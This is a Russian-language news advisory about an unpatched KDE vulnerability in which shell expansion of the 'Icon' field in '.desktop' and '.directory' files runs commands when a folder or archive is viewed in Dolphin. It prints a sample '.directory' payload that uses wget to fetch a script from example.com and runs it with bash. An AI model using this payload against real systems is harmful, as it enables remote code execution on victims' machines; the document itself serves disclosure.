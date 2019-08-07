В KDE выявлена уязвимость, позволяющая атакующему выполнить произвольные команды при просмотре пользователем каталога или архива, содержащего специально оформленные файлы ".desktop" и ".directory". Для атаки достаточно, чтобы пользователь просто просмотрел список файлов в файловом менеджере Dolphin, загрузил вредоносный desktop-файл или перетащил мышью ярлык на рабочий стол или в документ. Проблема проявляется в актуальном выпуске библиотек KDE Frameworks 5.60.0 и более старых версиях, вплоть до KDE 4. Уязвимость пока остаётся неисправленной (CVE не присвоен).

Проблема вызвана некорректной реализацией класса KDesktopFile, который при обработке переменной "Icon" без должного экранирования передаёт значение в функию KConfigPrivate::expandString(), которая выполняет раскрытие спецсимволов shell, в том числе обрабатывая строки "$(..)" как подлежащие исполнению команды. Вопреки требованиям спецификации XDG выполнение раскрытия shell-конструкций производится без разделения типа настроек, т.е. не только при определении командной строки запускаемого приложения, но и при указании отображаемых по умолчанию пиктограмм.

Например, для атаки достаточно отправить пользователю zip-архив с каталогом, содержащим файл ".directory" вида:

[Desktop Entry] Type=Directory Icon[$e]=$(wget${IFS}https://example.com/FILENAME.sh&&/bin/bash${IFS}FILENAME.sh)

При попытке просмотра содержимого архива в файловом менеджере Dolphin будет загружен и выполнен скрипт https://example.com/FILENAME.sh.



